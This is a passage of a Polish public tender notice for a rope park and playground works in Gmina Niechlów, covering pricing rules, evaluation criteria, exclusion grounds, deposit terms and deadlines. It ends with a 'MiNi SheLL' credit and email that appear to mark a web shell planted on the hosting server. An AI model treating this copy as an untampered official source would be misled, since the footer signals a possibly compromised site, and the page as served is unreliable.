uwagę obowiązki Wykonawcy wynikające ze wzoru umowy (załącznik nr 5, oraz załącznik nr 5A do SWZ).<br/>4.	Cenę brutto należy obliczyć poprzez dodanie do ceny netto podatku VAT według obowiązującej stawki podatku od towarów i usług (VAT) właściwą dla przedmiotu zamówienia, obowiązującą według stanu prawnego na dzień składania ofert.<br/>5.	Wykonawca wskaże cenę oferty, według wzoru wskazanego w Formularzu ofertowym - sporządzonym zgodnie z załącznikiem nr 1 do SWZ.<br/>6.	Cenę należy skalkulować w oparciu o dokumentację projektową, SWZ oraz specyfikacje techniczne wykonania i odbioru robót budowlanych.<br/>7.	Przed sporządzeniem oferty Zamawiający zaleca przeprowadzenie wizji lokalnej w terenie, celem zapoznania się ze stanem faktycznym obiektów i terenów przyległych do terenu objętego zamówieniem. <br/>8.	Załączone do niniejszej SWZ przedmiary robót pełnią funkcję pomocniczą i służą do przedstawienia przez Wykonawcę sposobu obliczenia ceny. <br/>9.	Cena oferty powinna być wyrażona w złotych polskich (PLN) z dokładnością do dwóch miejsc po przecinku. <br/>10.	Wszystkich działań/obliczeń należy dokonywać na liczbach zaokrąglonych do dwóch [ 2 ] miejsc po przecinku.<br/>11.	Zamawiający nie przewiduje rozliczeń w walucie obcej. <br/>12.	Wyliczona cena oferty brutto będzie służyć do porównania złożonych ofert i do rozliczenia w trakcie realizacji zamówienia. <br/>13.	Jeżeli została złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (t.j. Dz. U. z 2022 r. poz. 931, ze zm.), dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć . W ofercie, o której mowa w ust. 1, Wykonawca ma obowiązek: <br/>1)	poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego; <br/>2)	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego; <br/>3)	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku; <br/>4)	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie. <br/>14.	Podmioty zagraniczne na podstawie odrębnych przepisów dotyczących obrotu wewnątrzwspólnotowego nie są zobowiązane do uiszczenia podatku VAT w kraju odbiorcy (w kraju Zamawiającego), a sporządzane przez nich oferty muszą zawierać zerową stawkę VAT. Zamawiający dla potrzeb oceny i porównania ofert w przypadku oferty Wykonawcy mającego siedzibę poza granicami Polski doliczy do przedstawionych cen podatek od towarów i usług VAT, który ma obowiązek zapłacić zgodnie z obowiązującymi przepisami.<br/>15.	W przypadku rozbieżności pomiędzy ceną oferty podaną cyfrowo a słownie, jako wartość właściwa zostanie przyjęta cena podana cyfrowo.<br/>16.	Wykonawca zobowiązany jest do przestrzegania obowiązków wynikających z art. 225 ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art.. 112 ustawy PZP, zamawiający określa warunek/ warunki udziału w postępowaniu dotyczący/-e: <br/>1.	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia wymagań w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału – załącznik nr 3 do SWZ<br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia wymagań w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału – załącznik nr 3 do SWZ<br/>3.	Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż kwota oferty brutto. Warunek zostanie spełniony poprzez złożenie polisy ubezpieczenia stanowiącej. <br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. <br/><br/>4.	Zdolności technicznej lub zawodowej: <br/>DLA CZĘŚĆI NR 1 – BUDOWA PARKU LINOWEGO <br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>1)	wykonał należycie w okresie 5 lat przed dniem upływu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum dwie roboty budowlane (potwierdzone referencjami), polegające na budowie lub przebudowie, lub rozbudowie parku linowego na drzewach lub na elementach sztucznych (np. na słupach), w tym jedna robota o wartości minimum 500.000,00 zł brutto winna obejmować wykonanie takiego obiektu na elementach sztucznych (np. na słupach) jako bezobsługowego, tzn. niewymagającego obecności osób pełniących rolę instruktora/asekuranta oraz bez konieczności stosowania specjalnych systemów asekuracyjnych przez użytkowników (zdolność techniczna) – załącznik nr 6 do SWZ<br/>2)	skieruje do realizacji zamówienia publicznego minimum kierownika budowy posiadającego uprawnienia budowlane w specjalności konstrukcyjno – budowlanej oraz posiadającego zaświadczenie o przynależności do właściwej izby samorządu zawodowego (zdolność zawodowa) – załącznik 6A do SWZ<br/><br/><br/>DLA CZĘŚĆI NR 2 – BUDOWA I MODERNIZACJA PLACÓW ZABAW<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>3)	wykonał należycie w okresie 5 lat przed dniem upływu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum dwie roboty budowlane (potwierdzone referencjami), polegające na budowie/przebudowie lub rozbudowie i modernizacji placów zabaw o wartości minimum 200 000,00 zł brutto (zdolność techniczna) – załącznik nr 6 do SWZ <br/>4)	skieruje do realizacji zamówienia publicznego minimum kierownika budowy posiadającego uprawnienia budowlane w specjalności konstrukcyjno – budowlanej oraz posiadającego zaświadczenie o przynależności do właściwej izby samorządu zawodowego (zdolność zawodowa) - załącznik 6A do SWZ<br/><br/>5.	Zasady korzystania z zasobów innych podmiotów (jeżeli dotyczy):<br/>1)	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>2)	Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (sporządzone zgodnie z (załącznikiem nr 8 do SWZ) lub inny przedmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3)	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. 2) SWZ potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a)	Zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b)	Sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c)	Czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu, których wskazane zdolności dotyczą.<br/>4)	Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>5)	Jeżeli zdolności podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego:<br/>a)	Zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>b)	Wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>6)	Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał w danym zakresie na zdolnościach podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, wobec których zachodzi którakolwiek z okoliczności wskazanych:<br/>1)	w art. 108 ust. 1 ustawy PZP tj. <br/>2)	jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o którym mowa w pkt 1;<br/>3)	wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>4)	wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5)	jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi wykonawcami porozumienie mające na celu zakłócenie konkurencji, w szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie;<br/>6)	jeżeli, w przypadkach, o których mowa w art. 85 ust. 1, doszło do zakłócenia konkurencji wynikającego z wcześniejszego zaangażowania tego wykonawcy lub podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu o udzielenie zamówienia.<br/>2)	w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (przesłanka obligatoryjna) <br/>3)	w art. 109 ust. 1 pkt 1, 4 i 7 ustawy PZP tj. <br/>a)	ust. 1 pkt. 1 ustawy Pzp - który naruszył obowiązki dotyczące płatności podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadku, o którym mowa w art. 108 ust. 1 pkt 3, chyba że Wykonawca odpowiednio przed upływem terminu do składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie w sprawie spłaty tych należności;<br/>b)	ust. 1 pkt. 4 ustawy Pzp - w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury;<br/>c)	ust. 1 pkt. 7 ustawy Pzp - który, z przyczyn leżących po jego stronie, w znacznym stopniu lub zakresie nie wykonał lub nienależycie wykonał albo długotrwale nienależycie wykonywał istotne zobowiązanie wynikające z wcześniejszej umowy w sprawie zamówienia publicznego lub umowy koncesji, co doprowadziło do wypowiedzenia lub odstąpienia od umowy, odszkodowania, wykonania zastępczego lub realizacji uprawnień z tytułu rękojmi za wady; <br/>4)	Wykluczenie Wykonawcy następuje zgodnie z art. 111 ustawy PZP.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">DOKUMENTY SKŁADANE WRAZ Z OFERTĄ: <br/><br/>Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (załącznik nr 1 do SWZ)<br/><br/>Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu (załącznik nr 2 do SWZ) oraz spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SWZ) w zakresie wskazanym w rozdziale I pkt 7 SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe. <br/><br/>Do oferty wykonawca załącza również: <br/><br/>a)	Pełnomocnictwo – załącznik Wykonawcy<br/><br/>b)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (załącznik nr 7 do SWZ)<br/><br/>d)	Zobowiązanie podmiotu trzeciego (załącznik nr 8 do SWZ)<br/><br/>e)	Wadium <br/><br/>f)	Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>1)	Dla CZĘŚĆI I – 6 000,00 zł;<br/>2)	Dla CZĘŚĆI II – 3 000,00 zł.<br/>2.	W przypadku składania ofert na obie części, należy dokonać wpłaty wadium za CZĘŚĆI I i za CZĘŚĆI II <br/>3.	Wadium wnosi się przed upływem terminu składania ofert.<br/>4.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp tj. <br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego 33 8669 0001 0070 9899 2000 0006 Bank Spółdzielczy we Wschowie, Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego). <br/>UWAGA: Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>6.	Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy z dopiskiem: RRIOŚ.271.20.2022.AM oraz zaznaczeniem części zamówienia: <br/>Część I : BUDOWA PARKU LINOWEGO <br/>Część II: BUDOWA I MODERNIZACJA PLACÓW ZABAW<br/>7.	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy: <br/>1)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być: Gmina Niechlów <br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem, <br/>3)	kwotę gwarancji/poręczenia, <br/>4)	termin ważności gwarancji/poręczenia, <br/>5)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp. <br/>8.	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp. <br/>9.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca składa do oferty: <br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (załącznik nr 7 do SWZ)<br/>●Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy <br/>● Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/><br/>Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmian postanowień w zawartej umowie na podstawie art. 455 ust. 1 pkt. 1, oraz art. 439 ustawy p.z.p. w przypadku wystąpienia co najmniej jednej z niżej wymienionych okoliczności.<br/>2.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu Stron wyrażoną w drodze aneksu do umowy pod rygorem nieważności, za wyjątkiem sytuacji, dla których umowa dopuszcza inny sposób legalizacji. <br/>3.	Podstawą zmiany postanowień umowy jest pisemny wniosek Wykonawcy lub protokół konieczności, dokumentujące zaistnienie okoliczności skutkujących zmianą postanowień umowy.<br/>4.	Zamawiający przewiduje następujące okoliczności zmiany postanowień umowy:<br/>1)	Wystąpią środki ochrony prawnej<br/>2)	wystąpią opóźnienia w przekazaniu terenu budowy Wykonawcy robót z winy Zamawiającego;<br/>3)	zostaną w trakcie realizacji odkryte elementy konstrukcyjne, lub instalacje, które nie zostały zinwentaryzowane na etapie opracowania dokumentacji lub przyjęto w stosunku do nich w dokumentacji odmienne założenia niż okazało się w rzeczywistości, a mają one bezpośredni wpływ na realizację zadania z uwagi na konieczność ich przebudowy, likwidacji lub zabezpieczenia;<br/>4)	wystąpią opóźnienia będące następstwem działania organów administracji lub wystąpi konieczność aktualizacji uzgodnień poczynionych przez projektanta<br/>5)	wystąpi konieczność wykonania robót dodatkowych niezbędnych do zakończenia zakresu objętego przedmiotem umowy<br/>6)	wystąpi brak frontu robót z przyczyn niezależnych od Wykonawcy przez okres dłuższy niż 7 dni roboczych<br/>7)	wystąpią opóźnienia w rozpoczęciu czynności odbiorowych oraz prób końcowych z powodów nie leżących po stronie Wykonawcy;<br/>8)	wystąpią sytuacje nieprzewidziane - wystąpienie siły wyższej, zamieszki lub strajki, pandemia, wykopanie niewybuchów, odkrycie wykopalisk archeologicznych, odkrycie uzbrojenia terenu niezinwentaryzowanego na mapach, wystąpią odmienne niż przyjęte w dokumentacji projektowej warunki geologiczne<br/>9)	gdy Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca.<br/>10)	zapłata wynagrodzenia – w uzasadnionych przypadkach za zgodą Zamawiającego i Wykonawcy możliwa jest zmiana warunków zapłaty wynagrodzenia, a w tym między innymi: sposobu i formy płatności, terminu płatności.<br/>11)	nadzór nad wykonawstwem – zmiany osób pełniących samodzielne funkcje techniczne w budownictwie lub innych osób wyznaczonych do nadzorowania procesu inwestycyjnego ze strony Zamawiającego i Wykonawcy są dopuszczalne pod warunkiem posiadania przez te osoby wymaganych kwalifikacji – nie wymaga spisania aneksu.<br/>12)	wprowadzenie zmiany w danych Wykonawcy lub Zamawiającego wynikających z dokumentów rejestrowych<br/>13)	zmiana, wprowadzenie lub rezygnacja Podwykonawcy – w przypadkach uzasadnionych, za pisemną zgodą Zamawiającego, pod warunkiem spełnienia wymagań określonych w SWZ.<br/>14)	Zmiana Wykonawcy, któremu Zamawiający udzielił zamówienia w przypadku, gdy obecny Wykonawca nie realizuje zadania zgodnie z zapisami umowy, jego sytuacja prawna lub finansowa lub którego zasoby osobowe lub techniczne nie gwarantują terminowej lub prawidłowej realizacji przedmiotu zamówienia, po wyczerpaniu środków przewidzianych w umowie, w przypadku widocznego braku poprawy sytuacji. Zmiana nastąpi na podstawie oświadczenia przesłanego Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-05 15:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ttps://niechlow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-06 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com